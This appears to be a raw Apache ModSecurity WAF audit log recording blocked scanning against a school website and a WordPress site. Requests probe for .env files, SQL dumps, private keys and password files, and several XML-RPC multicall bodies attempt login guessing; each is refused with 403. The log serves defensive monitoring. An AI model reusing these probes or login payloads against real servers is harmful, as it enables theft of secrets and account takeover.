l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c886e67-Z-- --73471566-A-- [22/May/2025:11:52:17 +0700] aC6tgX0O04WKE1HJ5iQtEQAAABQ 103.236.140.4 55112 103.236.140.4 8181 --73471566-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --73471566-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73471566-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889537413099 848 (- - -) Stopwatch2: 1747889537413099 848; combined=345, p1=305, p2=0, p3=0, p4=0, p5=39, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73471566-Z-- --06eac479-A-- [22/May/2025:11:52:18 +0700] aC6tgiektx75wRFPQyiqVwAAAM0 103.236.140.4 55128 103.236.140.4 8181 --06eac479-B-- GET /.env.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --06eac479-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06eac479-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889538094155 802 (- - -) Stopwatch2: 1747889538094155 802; combined=337, p1=295, p2=0, p3=0, p4=0, p5=42, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06eac479-Z-- --2025d16c-A-- [22/May/2025:11:52:18 +0700] aC6tgn0O04WKE1HJ5iQtGwAAAAI 103.236.140.4 55148 103.236.140.4 8181 --2025d16c-B-- GET /.env.prod HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2025d16c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2025d16c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889538888480 784 (- - -) Stopwatch2: 1747889538888480 784; combined=284, p1=249, p2=0, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2025d16c-Z-- --276d6673-A-- [22/May/2025:11:52:25 +0700] aC6tieThJmFSRJ5-OZeIigAAAEI 103.236.140.4 55312 103.236.140.4 8181 --276d6673-B-- GET /dev/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --276d6673-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --276d6673-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889545353630 747 (- - -) Stopwatch2: 1747889545353630 747; combined=277, p1=243, p2=0, p3=0, p4=0, p5=33, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --276d6673-Z-- --f3c2d436-A-- [22/May/2025:11:52:26 +0700] aC6timfriXjg62qQwE8aVQAAAI4 103.236.140.4 55332 103.236.140.4 8181 --f3c2d436-B-- GET /application/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.81 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f3c2d436-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3c2d436-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889546048652 634 (- - -) Stopwatch2: 1747889546048652 634; combined=243, p1=212, p2=0, p3=0, p4=0, p5=31, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3c2d436-Z-- --4d736369-A-- [22/May/2025:11:53:04 +0700] aC6tsH0O04WKE1HJ5iQt8gAAAA0 103.236.140.4 56170 103.236.140.4 8181 --4d736369-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --4d736369-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d736369-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747889584107880 795 (- - -) Stopwatch2: 1747889584107880 795; combined=312, p1=273, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d736369-Z-- --40b9654f-A-- [22/May/2025:11:54:54 +0700] aC6uHiektx75wRFPQyisJQAAAMk 103.236.140.4 58516 103.236.140.4 8181 --40b9654f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 51.68.11.199 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 51.68.11.199 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --40b9654f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel8 --40b9654f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40b9654f-E-- --40b9654f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 51.68.11.199 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747889694974578 4711 (- - -) Stopwatch2: 1747889694974578 4711; combined=3252, p1=397, p2=2713, p3=0, p4=0, p5=85, sr=78, sw=57, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40b9654f-Z-- --11c03f38-A-- [22/May/2025:12:00:18 +0700] aC6vYiektx75wRFPQyiwgAAAANE 103.236.140.4 37212 103.236.140.4 8181 --11c03f38-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --11c03f38-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel1989 --11c03f38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11c03f38-E-- --11c03f38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890018348920 4480 (- - -) Stopwatch2: 1747890018348920 4480; combined=3153, p1=426, p2=2574, p3=0, p4=0, p5=87, sr=74, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11c03f38-Z-- --9fdf4826-A-- [22/May/2025:12:01:18 +0700] aC6vnmfriXjg62qQwE8eZwAAAJE 103.236.140.4 38530 103.236.140.4 8181 --9fdf4826-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9fdf4826-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdminantix123456 --9fdf4826-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fdf4826-E-- --9fdf4826-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890078560010 4692 (- - -) Stopwatch2: 1747890078560010 4692; combined=3239, p1=480, p2=2641, p3=0, p4=0, p5=69, sr=88, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fdf4826-Z-- --da31d45f-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi0zAAAAMw 103.236.140.4 43962 103.236.140.4 8181 --da31d45f-B-- GET /web.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --da31d45f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da31d45f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332224848 764 (- - -) Stopwatch2: 1747890332224848 764; combined=289, p1=253, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da31d45f-Z-- --33e28b47-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi0zgAAANY 103.236.140.4 43966 103.236.140.4 8181 --33e28b47-B-- GET /database_backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --33e28b47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33e28b47-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332230426 1800 (- - -) Stopwatch2: 1747890332230426 1800; combined=670, p1=291, p2=355, p3=0, p4=0, p5=24, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33e28b47-Z-- --4a997a26-A-- [22/May/2025:12:05:32 +0700] aC6wnGfriXjg62qQwE8fiQAAAJQ 103.236.140.4 43972 103.236.140.4 8181 --4a997a26-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4a997a26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a997a26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332248639 559 (- - -) Stopwatch2: 1747890332248639 559; combined=214, p1=185, p2=0, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a997a26-Z-- --821f4328-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi00QAAAMc 103.236.140.4 43978 103.236.140.4 8181 --821f4328-B-- GET /database.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --821f4328-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --821f4328-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332253978 1473 (- - -) Stopwatch2: 1747890332253978 1473; combined=553, p1=253, p2=272, p3=0, p4=0, p5=28, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --821f4328-Z-- --2b5a9f5a-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi00gAAAMo 103.236.140.4 43980 103.236.140.4 8181 --2b5a9f5a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2b5a9f5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b5a9f5a-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332255188 611 (- - -) Stopwatch2: 1747890332255188 611; combined=251, p1=225, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b5a9f5a-Z-- --41997048-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi00wAAAM0 103.236.140.4 43982 103.236.140.4 8181 --41997048-B-- GET /backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --41997048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41997048-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332255516 1445 (- - -) Stopwatch2: 1747890332255516 1445; combined=502, p1=249, p2=231, p3=0, p4=0, p5=22, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41997048-Z-- --d9850e5b-A-- [22/May/2025:12:05:32 +0700] aC6wnGfriXjg62qQwE8figAAAI0 103.236.140.4 43988 103.236.140.4 8181 --d9850e5b-B-- GET /server.key HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d9850e5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9850e5b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332256890 1341 (- - -) Stopwatch2: 1747890332256890 1341; combined=490, p1=255, p2=213, p3=0, p4=0, p5=22, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9850e5b-Z-- --aea2521d-A-- [22/May/2025:12:05:32 +0700] aC6wnGfriXjg62qQwE8fiwAAAJE 103.236.140.4 43990 103.236.140.4 8181 --aea2521d-B-- GET /_vti_pvt/service.pwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --aea2521d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aea2521d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".pwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332257291 1354 (- - -) Stopwatch2: 1747890332257291 1354; combined=497, p1=249, p2=225, p3=0, p4=0, p5=22, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aea2521d-Z-- --6280fe3d-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi01QAAAM4 103.236.140.4 43994 103.236.140.4 8181 --6280fe3d-B-- GET /dump.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6280fe3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6280fe3d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332280004 1734 (- - -) Stopwatch2: 1747890332280004 1734; combined=652, p1=329, p2=297, p3=0, p4=0, p5=25, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6280fe3d-Z-- --6320d961-A-- [22/May/2025:12:05:32 +0700] aC6wnGfriXjg62qQwE8fkQAAAIU 103.236.140.4 44006 103.236.140.4 8181 --6320d961-B-- GET /etc/ssl/private/server.key HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6320d961-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6320d961-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332312456 1482 (- - -) Stopwatch2: 1747890332312456 1482; combined=541, p1=265, p2=250, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
